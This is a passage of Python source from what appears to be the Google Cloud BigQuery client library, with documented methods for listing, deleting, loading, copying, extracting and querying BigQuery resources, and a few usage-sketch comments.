if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset, DatasetReference, or string")
path = "%s/models" % dataset.path
result = page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_model,
items_key="models",
page_token=page_token,
max_results=max_results,
)
result.dataset = dataset
return result
def list_routines(
self, dataset, max_results=None, page_token=None, retry=DEFAULT_RETRY
):
"""[Beta] List routines in the dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/routines/list
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset whose routines to list from the
BigQuery API. If a string is passed in, this method attempts
to create a dataset reference from a string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
max_results (int):
(Optional) Maximum number of routines to return. If not passed,
defaults to a value set by the API.
page_token (str):
(Optional) Token representing a cursor into the routines. If
not passed, the API will return the first page of routines. The
token marks the beginning of the iterator to be returned and
the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of all
:class:`~google.cloud.bigquery.routine.Routine`s contained
within the requested dataset, limited by ``max_results``.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset, DatasetReference, or string")
path = "{}/routines".format(dataset.path)
result = page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_routine,
items_key="routines",
page_token=page_token,
max_results=max_results,
)
result.dataset = dataset
return result
def list_tables(
self, dataset, max_results=None, page_token=None, retry=DEFAULT_RETRY
):
"""List tables in the dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/list
Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset whose tables to list from the
BigQuery API. If a string is passed in, this method attempts
to create a dataset reference from a string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
max_results (int):
(Optional) Maximum number of tables to return. If not passed,
defaults to a value set by the API.
page_token (str):
(Optional) Token representing a cursor into the tables. If
not passed, the API will return the first page of tables. The
token marks the beginning of the iterator to be returned and
the value of the ``page_token`` can be accessed at
``next_page_token`` of the
:class:`~google.api_core.page_iterator.HTTPIterator`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
Returns:
google.api_core.page_iterator.Iterator:
Iterator of
:class:`~google.cloud.bigquery.table.TableListItem` contained
within the requested dataset.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset, DatasetReference, or string")
path = "%s/tables" % dataset.path
result = page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_table,
items_key="tables",
page_token=page_token,
max_results=max_results,
)
result.dataset = dataset
return result
def delete_dataset(
self, dataset, delete_contents=False, retry=DEFAULT_RETRY, not_found_ok=False
):
"""Delete a dataset.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/datasets/delete
        Args:
dataset (Union[ \
:class:`~google.cloud.bigquery.dataset.Dataset`, \
:class:`~google.cloud.bigquery.dataset.DatasetReference`, \
str, \
]):
A reference to the dataset to delete. If a string is passed
in, this method attempts to create a dataset reference from a
string using
:func:`google.cloud.bigquery.dataset.DatasetReference.from_string`.
delete_contents (boolean):
(Optional) If True, delete all the tables in the dataset. If
False and the dataset contains tables, the request will fail.
Default is False.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the dataset.
"""
if isinstance(dataset, str):
dataset = DatasetReference.from_string(
dataset, default_project=self.project
)
if not isinstance(dataset, (Dataset, DatasetReference)):
raise TypeError("dataset must be a Dataset or a DatasetReference")
params = {}
if delete_contents:
params["deleteContents"] = "true"
try:
self._call_api(
retry, method="DELETE", path=dataset.path, query_params=params
)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def delete_model(self, model, retry=DEFAULT_RETRY, not_found_ok=False):
"""[Beta] Delete a model
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/models/delete
Args:
model (Union[ \
:class:`~google.cloud.bigquery.model.Model`, \
:class:`~google.cloud.bigquery.model.ModelReference`, \
str, \
]):
A reference to the model to delete. If a string is passed in,
this method attempts to create a model reference from a
string using
:func:`google.cloud.bigquery.model.ModelReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the model.
"""
if isinstance(model, str):
model = ModelReference.from_string(model, default_project=self.project)
if not isinstance(model, (Model, ModelReference)):
raise TypeError("model must be a Model or a ModelReference")
try:
self._call_api(retry, method="DELETE", path=model.path)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def delete_routine(self, routine, retry=DEFAULT_RETRY, not_found_ok=False):
"""[Beta] Delete a routine.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/routines/delete
Args:
            routine (Union[ \
:class:`~google.cloud.bigquery.routine.Routine`, \
:class:`~google.cloud.bigquery.routine.RoutineReference`, \
str, \
]):
A reference to the routine to delete. If a string is passed
in, this method attempts to create a routine reference from a
string using
:func:`google.cloud.bigquery.routine.RoutineReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the routine.
"""
if isinstance(routine, str):
routine = RoutineReference.from_string(
routine, default_project=self.project
)
if not isinstance(routine, (Routine, RoutineReference)):
raise TypeError("routine must be a Routine or a RoutineReference")
try:
self._call_api(retry, method="DELETE", path=routine.path)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def delete_table(self, table, retry=DEFAULT_RETRY, not_found_ok=False):
"""Delete a table
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables/delete
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
A reference to the table to delete. If a string is passed in,
this method attempts to create a table reference from a
string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
retry (:class:`google.api_core.retry.Retry`):
(Optional) How to retry the RPC.
not_found_ok (bool):
Defaults to ``False``. If ``True``, ignore "not found" errors
when deleting the table.
"""
table = _table_arg_to_table_ref(table, default_project=self.project)
if not isinstance(table, TableReference):
raise TypeError("Unable to get TableReference for table '{}'".format(table))
try:
self._call_api(retry, method="DELETE", path=table.path)
except google.api_core.exceptions.NotFound:
if not not_found_ok:
raise
def _get_query_results(
self, job_id, retry, project=None, timeout_ms=None, location=None
):
"""Get the query results object for a query job.
Arguments:
job_id (str): Name of the query job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
project (str):
(Optional) project ID for the query job (defaults to the
project of the client).
timeout_ms (int):
(Optional) number of milliseconds the API call should
wait for the query to complete before the request times out.
location (str): Location of the query job.
Returns:
google.cloud.bigquery.query._QueryResults:
A new ``_QueryResults`` instance.
"""
extra_params = {"maxResults": 0}
if project is None:
project = self.project
if timeout_ms is not None:
extra_params["timeoutMs"] = timeout_ms
if location is None:
location = self.location
if location is not None:
extra_params["location"] = location
path = "/projects/{}/queries/{}".format(project, job_id)
# This call is typically made in a polling loop that checks whether the
# job is complete (from QueryJob.done(), called ultimately from
# QueryJob.result()). So we don't need to poll here.
resource = self._call_api(
retry, method="GET", path=path, query_params=extra_params
)
return _QueryResults.from_api_repr(resource)
def job_from_resource(self, resource):
"""Detect correct job type from resource and instantiate.
:type resource: dict
:param resource: one job resource from API response
:rtype: One of:
:class:`google.cloud.bigquery.job.LoadJob`,
:class:`google.cloud.bigquery.job.CopyJob`,
:class:`google.cloud.bigquery.job.ExtractJob`,
or :class:`google.cloud.bigquery.job.QueryJob`
:returns: the job instance, constructed via the resource
"""
config = resource.get("configuration", {})
if "load" in config:
return job.LoadJob.from_api_repr(resource, self)
elif "copy" in config:
return job.CopyJob.from_api_repr(resource, self)
elif "extract" in config:
return job.ExtractJob.from_api_repr(resource, self)
elif "query" in config:
return job.QueryJob.from_api_repr(resource, self)
return job.UnknownJob.from_api_repr(resource, self)
def get_job(self, job_id, project=None, location=None, retry=DEFAULT_RETRY):
"""Fetch a job for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/get
Arguments:
job_id (str): Unique job identifier.
Keyword Arguments:
project (str):
(Optional) ID of the project which owns the job (defaults to
the client's project).
location (str): Location where the job was run.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
Union[google.cloud.bigquery.job.LoadJob, \
google.cloud.bigquery.job.CopyJob, \
google.cloud.bigquery.job.ExtractJob, \
google.cloud.bigquery.job.QueryJob]:
Job instance, based on the resource returned by the API.
"""
extra_params = {"projection": "full"}
if project is None:
project = self.project
if location is None:
location = self.location
if location is not None:
extra_params["location"] = location
path = "/projects/{}/jobs/{}".format(project, job_id)
resource = self._call_api(
retry, method="GET", path=path, query_params=extra_params
)
return self.job_from_resource(resource)
def cancel_job(self, job_id, project=None, location=None, retry=DEFAULT_RETRY):
"""Attempt to cancel a job from a job ID.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/cancel
Arguments:
job_id (str): Unique job identifier.
Keyword Arguments:
project (str):
(Optional) ID of the project which owns the job (defaults to
the client's project).
location (str): Location where the job was run.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
Union[google.cloud.bigquery.job.LoadJob, \
google.cloud.bigquery.job.CopyJob, \
google.cloud.bigquery.job.ExtractJob, \
google.cloud.bigquery.job.QueryJob]:
Job instance, based on the resource returned by the API.
"""
extra_params = {"projection": "full"}
if project is None:
project = self.project
if location is None:
location = self.location
if location is not None:
extra_params["location"] = location
path = "/projects/{}/jobs/{}/cancel".format(project, job_id)
resource = self._call_api(
retry, method="POST", path=path, query_params=extra_params
)
return self.job_from_resource(resource["job"])
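# Editor's note: illustrative sketch of fetching and cancelling a job by ID
# (comments only; the job ID and location are hypothetical assumptions).
#
#     found_job = client.get_job("bquxjob_1234", location="US")
#     if found_job.state != "DONE":
#         client.cancel_job(found_job.job_id, location=found_job.location)
#
# Cancellation is best-effort: the returned job may still run to completion.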
def list_jobs(
self,
project=None,
max_results=None,
page_token=None,
all_users=None,
state_filter=None,
retry=DEFAULT_RETRY,
min_creation_time=None,
max_creation_time=None,
):
"""List jobs for the project associated with this client.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs/list
Args:
project (str, optional):
Project ID to use for retrieving jobs. Defaults
to the client's project.
max_results (int, optional):
Maximum number of jobs to return.
page_token (str, optional):
Opaque marker for the next "page" of jobs. If not
passed, the API will return the first page of jobs. The token
marks the beginning of the iterator to be returned and the
value of the ``page_token`` can be accessed at
``next_page_token`` of
:class:`~google.api_core.page_iterator.HTTPIterator`.
all_users (bool, optional):
If true, include jobs owned by all users in the project.
Defaults to :data:`False`.
state_filter (str, optional):
If set, include only jobs matching the given state. One of:
* ``"done"``
* ``"pending"``
* ``"running"``
retry (google.api_core.retry.Retry, optional):
How to retry the RPC.
min_creation_time (datetime.datetime, optional):
Min value for job creation time. If set, only jobs created
after or at this timestamp are returned. If the datetime has
no time zone, UTC is assumed.
max_creation_time (datetime.datetime, optional):
Max value for job creation time. If set, only jobs created
before or at this timestamp are returned. If the datetime has
no time zone, UTC is assumed.
Returns:
google.api_core.page_iterator.Iterator:
Iterable of job instances.
"""
extra_params = {
"allUsers": all_users,
"stateFilter": state_filter,
"minCreationTime": _str_or_none(
google.cloud._helpers._millis_from_datetime(min_creation_time)
),
"maxCreationTime": _str_or_none(
google.cloud._helpers._millis_from_datetime(max_creation_time)
),
"projection": "full",
}
extra_params = {
param: value for param, value in extra_params.items() if value is not None
}
if project is None:
project = self.project
path = "/projects/%s/jobs" % (project,)
return page_iterator.HTTPIterator(
client=self,
api_request=functools.partial(self._call_api, retry),
path=path,
item_to_value=_item_to_job,
items_key="jobs",
page_token=page_token,
max_results=max_results,
extra_params=extra_params,
)
def load_table_from_uri(
self,
source_uris,
destination,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
retry=DEFAULT_RETRY,
):
"""Starts a job for loading data into a table from Cloud Storage.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.load
Arguments:
source_uris (Union[str, Sequence[str]]):
URIs of data files to be loaded; in format
``gs://<bucket_name>/<object_name_or_glob>``.
destination (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table into which data is to be loaded. If a string is passed
in, this method attempts to create a table reference from a
string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
Keyword Arguments:
job_id (str): (Optional) Name of the job.
job_id_prefix (str):
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
destination table.
project (str):
Project ID of the project where the job runs. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.LoadJobConfig):
(Optional) Extra configuration options for the job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.LoadJob: A new load job.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
job_ref = job._JobReference(job_id, project=project, location=location)
if isinstance(source_uris, six.string_types):
source_uris = [source_uris]
destination = _table_arg_to_table_ref(destination, default_project=self.project)
load_job = job.LoadJob(job_ref, source_uris, destination, self, job_config)
load_job._begin(retry=retry)
return load_job
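# Editor's note: hedged usage sketch for load_table_from_uri; the bucket, object
# and table names are placeholders, not values from this codebase.
#
#     job_config = job.LoadJobConfig(
#         source_format=job.SourceFormat.CSV, skip_leading_rows=1, autodetect=True
#     )
#     load_job = client.load_table_from_uri(
#         "gs://example-bucket/data.csv", "my_dataset.my_table", job_config=job_config
#     )
#     load_job.result()  # blocks until the load job finishes or raises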
def load_table_from_file(
self,
file_obj,
destination,
rewind=False,
size=None,
num_retries=_DEFAULT_NUM_RETRIES,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
):
"""Upload the contents of this table from a file-like object.
Similar to :meth:`load_table_from_uri`, this method creates, starts and
returns a :class:`~google.cloud.bigquery.job.LoadJob`.
Arguments:
file_obj (file): A file handle opened in binary mode for reading.
destination (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table into which data is to be loaded. If a string is passed
in, this method attempts to create a table reference from a
string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
Keyword Arguments:
rewind (bool):
If True, seek to the beginning of the file handle before
reading the file.
size (int):
The number of bytes to read from the file handle. If size is
``None`` or large, resumable upload will be used. Otherwise,
multipart upload will be used.
num_retries (int): Number of upload retries. Defaults to 6.
job_id (str): (Optional) Name of the job.
job_id_prefix (str):
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
destination table.
project (str):
Project ID of the project where the job runs. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.LoadJobConfig):
(Optional) Extra configuration options for the job.
Returns:
google.cloud.bigquery.job.LoadJob: A new load job.
Raises:
ValueError:
If ``size`` is not passed in and can not be determined, or if
the ``file_obj`` can be detected to be a file opened in text
mode.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
destination = _table_arg_to_table_ref(destination, default_project=self.project)
job_ref = job._JobReference(job_id, project=project, location=location)
load_job = job.LoadJob(job_ref, None, destination, self, job_config)
job_resource = load_job.to_api_repr()
if rewind:
file_obj.seek(0, os.SEEK_SET)
_check_mode(file_obj)
try:
if size is None or size >= _MAX_MULTIPART_SIZE:
response = self._do_resumable_upload(
file_obj, job_resource, num_retries
)
else:
response = self._do_multipart_upload(
file_obj, job_resource, size, num_retries
)
except resumable_media.InvalidResponse as exc:
raise exceptions.from_http_response(exc.response)
return self.job_from_resource(response.json())
def load_table_from_dataframe(
self,
dataframe,
destination,
num_retries=_DEFAULT_NUM_RETRIES,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
parquet_compression="snappy",
):
"""Upload the contents of a table from a pandas DataFrame.
Similar to :meth:`load_table_from_uri`, this method creates, starts and
returns a :class:`~google.cloud.bigquery.job.LoadJob`.
Arguments:
dataframe (pandas.DataFrame):
A :class:`~pandas.DataFrame` containing the data to load.
destination (google.cloud.bigquery.table.TableReference):
The destination table to use for loading the data. If it is an
existing table, the schema of the :class:`~pandas.DataFrame`
must match the schema of the destination table. If the table
does not yet exist, the schema is inferred from the
:class:`~pandas.DataFrame`.
If a string is passed in, this method attempts to create a
table reference from a string using
:func:`google.cloud.bigquery.table.TableReference.from_string`.
Keyword Arguments:
num_retries (int, optional): Number of upload retries.
job_id (str, optional): Name of the job.
job_id_prefix (str, optional):
The user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
destination table.
project (str, optional):
Project ID of the project where the job runs. Defaults
to the client's project.
job_config (~google.cloud.bigquery.job.LoadJobConfig, optional):
Extra configuration options for the job.
To override the default pandas data type conversions, supply
a value for
:attr:`~google.cloud.bigquery.job.LoadJobConfig.schema` with
column names matching those of the dataframe. The BigQuery
schema is used to determine the correct data type conversion.
Indexes are not loaded. Requires the :mod:`pyarrow` library.
parquet_compression (str):
[Beta] The compression method to use when temporarily
serializing ``dataframe`` to a parquet file.
If ``pyarrow`` and job config schema are used, the argument
is directly passed as the ``compression`` argument to the
underlying ``pyarrow.parquet.write_table()`` method (the
default value "snappy" gets converted to uppercase).
https://arrow.apache.org/docs/python/generated/pyarrow.parquet.write_table.html#pyarrow-parquet-write-table
If either ``pyarrow`` or job config schema are missing, the
argument is directly passed as the ``compression`` argument
to the underlying ``DataFrame.to_parquet()`` method.
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.to_parquet.html#pandas.DataFrame.to_parquet
Returns:
google.cloud.bigquery.job.LoadJob: A new load job.
Raises:
ImportError:
If a usable parquet engine cannot be found. This method
requires :mod:`pyarrow` or :mod:`fastparquet` to be
installed.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if job_config is None:
job_config = job.LoadJobConfig()
job_config.source_format = job.SourceFormat.PARQUET
if location is None:
location = self.location
tmpfd, tmppath = tempfile.mkstemp(suffix="_job_{}.parquet".format(job_id[:8]))
os.close(tmpfd)
try:
if pyarrow and job_config.schema:
if parquet_compression == "snappy": # adjust the default value
parquet_compression = parquet_compression.upper()
_pandas_helpers.dataframe_to_parquet(
dataframe,
job_config.schema,
tmppath,
parquet_compression=parquet_compression,
)
else:
if job_config.schema:
warnings.warn(
"job_config.schema is set, but not used to assist in "
"identifying correct types for data serialization. "
"Please install the pyarrow package.",
PendingDeprecationWarning,
stacklevel=2,
)
dataframe.to_parquet(tmppath, compression=parquet_compression)
with open(tmppath, "rb") as parquet_file:
return self.load_table_from_file(
parquet_file,
destination,
num_retries=num_retries,
rewind=True,
job_id=job_id,
job_id_prefix=job_id_prefix,
location=location,
project=project,
job_config=job_config,
)
finally:
os.remove(tmppath)
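# Editor's note: sketch of loading a pandas DataFrame (assumes pandas and pyarrow
# are installed; the destination table ID is a placeholder).
#
#     import pandas as pd
#     df = pd.DataFrame({"name": ["a", "b"], "value": [1, 2]})
#     load_job = client.load_table_from_dataframe(df, "my_dataset.my_table")
#     load_job.result()  # wait for the load to complete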
def _do_resumable_upload(self, stream, metadata, num_retries):
"""Perform a resumable upload.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:type metadata: dict
:param metadata: The metadata associated with the upload.
:type num_retries: int
:param num_retries: Number of upload retries. (Deprecated: This
argument will be removed in a future release.)
:rtype: :class:`~requests.Response`
:returns: The "200 OK" response object returned after the final chunk
is uploaded.
"""
upload, transport = self._initiate_resumable_upload(
stream, metadata, num_retries
)
while not upload.finished:
response = upload.transmit_next_chunk(transport)
return response
def _initiate_resumable_upload(self, stream, metadata, num_retries):
"""Initiate a resumable upload.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:type metadata: dict
:param metadata: The metadata associated with the upload.
:type num_retries: int
:param num_retries: Number of upload retries. (Deprecated: This
argument will be removed in a future release.)
:rtype: tuple
:returns:
Pair of
* The :class:`~google.resumable_media.requests.ResumableUpload`
that was created
* The ``transport`` used to initiate the upload.
"""
chunk_size = _DEFAULT_CHUNKSIZE
transport = self._http
headers = _get_upload_headers(self._connection.user_agent)
upload_url = _RESUMABLE_URL_TEMPLATE.format(project=self.project)
# TODO: modify ResumableUpload to take a retry.Retry object
# that it can use for the initial RPC.
upload = ResumableUpload(upload_url, chunk_size, headers=headers)
if num_retries is not None:
upload._retry_strategy = resumable_media.RetryStrategy(
max_retries=num_retries
)
upload.initiate(
transport, stream, metadata, _GENERIC_CONTENT_TYPE, stream_final=False
)
return upload, transport
def _do_multipart_upload(self, stream, metadata, size, num_retries):
"""Perform a multipart upload.
:type stream: IO[bytes]
:param stream: A bytes IO object open for reading.
:type metadata: dict
:param metadata: The metadata associated with the upload.
:type size: int
:param size: The number of bytes to be uploaded (which will be read
from ``stream``). If not provided, the upload will be
concluded once ``stream`` is exhausted (or :data:`None`).
:type num_retries: int
:param num_retries: Number of upload retries. (Deprecated: This
argument will be removed in a future release.)
:rtype: :class:`~requests.Response`
:returns: The "200 OK" response object returned after the multipart
upload request.
:raises: :exc:`ValueError` if the ``stream`` has fewer than ``size``
bytes remaining.
"""
data = stream.read(size)
if len(data) < size:
msg = _READ_LESS_THAN_SIZE.format(size, len(data))
raise ValueError(msg)
headers = _get_upload_headers(self._connection.user_agent)
upload_url = _MULTIPART_URL_TEMPLATE.format(project=self.project)
upload = MultipartUpload(upload_url, headers=headers)
if num_retries is not None:
upload._retry_strategy = resumable_media.RetryStrategy(
max_retries=num_retries
)
response = upload.transmit(self._http, data, metadata, _GENERIC_CONTENT_TYPE)
return response
def copy_table(
self,
sources,
destination,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
retry=DEFAULT_RETRY,
):
"""Copy one or more tables to another table.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.copy
Arguments:
sources (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
Sequence[ \
Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
] \
], \
]):
Table or tables to be copied.
destination (Union[
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table into which data is to be copied.
Keyword Arguments:
job_id (str): (Optional) The ID of the job.
job_id_prefix (str):
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of any
source table as well as the destination table.
project (str):
Project ID of the project where the job runs. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.CopyJobConfig):
(Optional) Extra configuration options for the job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.CopyJob: A new copy job instance.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
job_ref = job._JobReference(job_id, project=project, location=location)
# sources can be one of many different input types. (string, Table,
# TableReference, or a sequence of any of those.) Convert them all to a
# list of TableReferences.
#
# _table_arg_to_table_ref leaves lists unmodified.
sources = _table_arg_to_table_ref(sources, default_project=self.project)
if not isinstance(sources, collections_abc.Sequence):
sources = [sources]
sources = [
_table_arg_to_table_ref(source, default_project=self.project)
for source in sources
]
destination = _table_arg_to_table_ref(destination, default_project=self.project)
copy_job = job.CopyJob(
job_ref, sources, destination, client=self, job_config=job_config
)
copy_job._begin(retry=retry)
return copy_job
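# Editor's note: minimal copy_table sketch (comments only; the table IDs are
# hypothetical).
#
#     copy_job = client.copy_table(
#         "my_dataset.source_table", "my_dataset.destination_table"
#     )
#     copy_job.result()  # wait for the copy to finish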
def extract_table(
self,
source,
destination_uris,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
job_config=None,
retry=DEFAULT_RETRY,
):
"""Start a job to extract a table into Cloud Storage files.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.extract
Arguments:
source (Union[ \
:class:`google.cloud.bigquery.table.Table`, \
:class:`google.cloud.bigquery.table.TableReference`, \
str, \
]):
Table to be extracted.
destination_uris (Union[str, Sequence[str]]):
URIs of Cloud Storage file(s) into which table data is to be
extracted; in format
``gs://<bucket_name>/<object_name_or_glob>``.
Keyword Arguments:
job_id (str): (Optional) The ID of the job.
job_id_prefix (str):
(Optional) the user-provided prefix for a randomly generated
job ID. This parameter will be ignored if a ``job_id`` is
also given.
location (str):
Location where to run the job. Must match the location of the
source table.
project (str):
Project ID of the project where the job runs. Defaults
to the client's project.
job_config (google.cloud.bigquery.job.ExtractJobConfig):
(Optional) Extra configuration options for the job.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.ExtractJob: A new extract job instance.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
job_ref = job._JobReference(job_id, project=project, location=location)
source = _table_arg_to_table_ref(source, default_project=self.project)
if isinstance(destination_uris, six.string_types):
destination_uris = [destination_uris]
extract_job = job.ExtractJob(
job_ref, source, destination_uris, client=self, job_config=job_config
)
extract_job._begin(retry=retry)
return extract_job
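# Editor's note: sketch of exporting a table to Cloud Storage; the bucket and
# table names are assumptions for illustration only.
#
#     extract_job = client.extract_table(
#         "my_dataset.my_table", "gs://example-bucket/export-*.csv"
#     )
#     extract_job.result()  # wait for the export to finish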
def query(
self,
query,
job_config=None,
job_id=None,
job_id_prefix=None,
location=None,
project=None,
retry=DEFAULT_RETRY,
):
"""Run a SQL query.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.query
Arguments:
query (str):
SQL query to be executed. Defaults to the standard SQL
dialect. Use the ``job_config`` parameter to change dialects.
Keyword Arguments:
job_config (google.cloud.bigquery.job.QueryJobConfig):
(Optional) Extra configuration options for the job.
To override any options that were previously set in
the ``default_query_job_config`` given to the
``Client`` constructor, manually set those options to ``None``,
or whatever value is preferred.
job_id (str): (Optional) ID to use for the query job.
job_id_prefix (str):
(Optional) The prefix to use for a randomly generated job ID.
This parameter will be ignored if a ``job_id`` is also given.
location (str):
Location where to run the job. Must match the location of
any table used in the query as well as the destination table.
project (str):
Project ID of the project where the job runs. Defaults
to the client's project.
retry (google.api_core.retry.Retry):
(Optional) How to retry the RPC.
Returns:
google.cloud.bigquery.job.QueryJob: A new query job instance.
"""
job_id = _make_job_id(job_id, job_id_prefix)
if project is None:
project = self.project
if location is None:
location = self.location
if self._default_query_job_config:
if job_config:
# anything that's not defined on the incoming
# that is in the default,
# should be filled in with the default
# the incoming therefore has precedence
job_config = job_config._fill_from_default(
self._default_query_job_config
)
else:
job_config = self._default_query_job_config
job_ref = job._JobReference(job_id, project=project, location=location)
query_job = job.QueryJob(job_ref, query, client=self, job_config=job_config)
query_job._begin(retry=retry)
return query_job
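# Editor's note: hedged sketch of running a query and iterating its rows.
#
#     query_job = client.query("SELECT 1 AS x, 'hello' AS y")
#     for row in query_job.result():  # result() waits for the job to complete
#         print(row.x, row.y)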
def insert_rows(self, table, rows, selected_fields=None, **kwargs):
"""Insert rows into a table via the streaming API.
See
https://cloud.google.com/bigquery/docs/reference/rest/v2/tabledata/insertAll
Args:
table (Union[ \
:class:`~google.cloud.bigquery.table.Table`, \
:class:`~google.cloud.bigquery.table.TableReference`, \
str, \
]):
The destination table for the row data, or a reference to it.
rows (Union[ \
Sequence[Tuple], \
Sequence[dict], \
]):
Row data to be inserted. If a list of tuples is given, each
tuple should contain data for each schema field on the
current table and in the same order as the schema fields. If
a list of dictionaries is given, the keys must include all
required fields in the schema. Keys which do not correspond
to a field in the schema are ignored.
selected_fields (Sequence[ \
:class:`~google.cloud.bigquery.schema.SchemaField`, \
]):
The fields to return. Required if ``table`` is a
:class:`~google.cloud.bigquery.table.TableReference`.
kwargs (dict):
Keyword arguments to
:meth:`~google.cloud.bigquery.client.Client.insert_rows_json`.
Returns:
Sequence[Mappings]:
One mapping per row with insert errors: the "index" key
identifies the row, and the "errors" key contains a list of
the mappings describing one or more problems with the row.
Raises:
ValueError: if table's schema is not set
"""
table = _table_arg_to_table(table, default_project=self.project)
if not isinstance(table, Table):
raise TypeError(_NEED_TABLE_ARGUMENT)
schema = table.schema
# selected_fields can override the table schema.
if selected_fields is not None:
schema = selected_fields
if len(schema) == 0:
raise ValueError(
(
"Could not determine schema for table '{}'. Call client.get_table() "
"or pass in a list of schema fields to the selected_fields argument."
).format(table)
)
json_rows = [_record_field_to_json(schema, row) for row in rows]
return self.insert_rows_json(table, json_rows, **kwargs)
def insert_rows_json(
self,
table,
json_rows,
row_ids=None,
skip_invalid_rows=None,
ignore_unknown_values=None,
template_suffix=None,
retry=DEFAULT_RETRY,
):
"""Insert rows into a table without applying local type conversions.
See
